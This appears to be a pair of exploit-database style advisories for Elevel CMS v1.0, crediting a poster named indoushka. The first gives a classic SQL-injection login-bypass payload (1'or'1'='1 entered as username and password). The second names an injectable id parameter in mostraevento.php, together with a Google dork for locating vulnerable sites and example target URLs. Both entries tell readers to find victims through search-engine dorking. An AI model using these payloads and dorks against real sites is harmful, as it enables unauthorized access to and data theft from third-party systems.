==================================================================================================================================== | # Title : Elevel CMS v1.0 authentication bypass vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.elevel.it/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] uSE pAYLOAD : user & pass : 1'or'1'='1 [+] http://127.0.0.1/gruppimolleportoniit/login.php Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | ======================================================================================================================================= ==================================================================================================================================== | # Title : Elevel CMS v1.0 "mostraevento.php" Sql Injection vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit) | | # Vendor : http://www.elevel.it/ | | # Dork : inurl:mostraevento.php?id= | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : /mostraevento.php?id=39 (inject her) [+] http://www/puntamarinatermeit/mostraevento.php?id=47 (inject her) Greetings to :========================================================================================================================= jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr | =======================================================================================================================================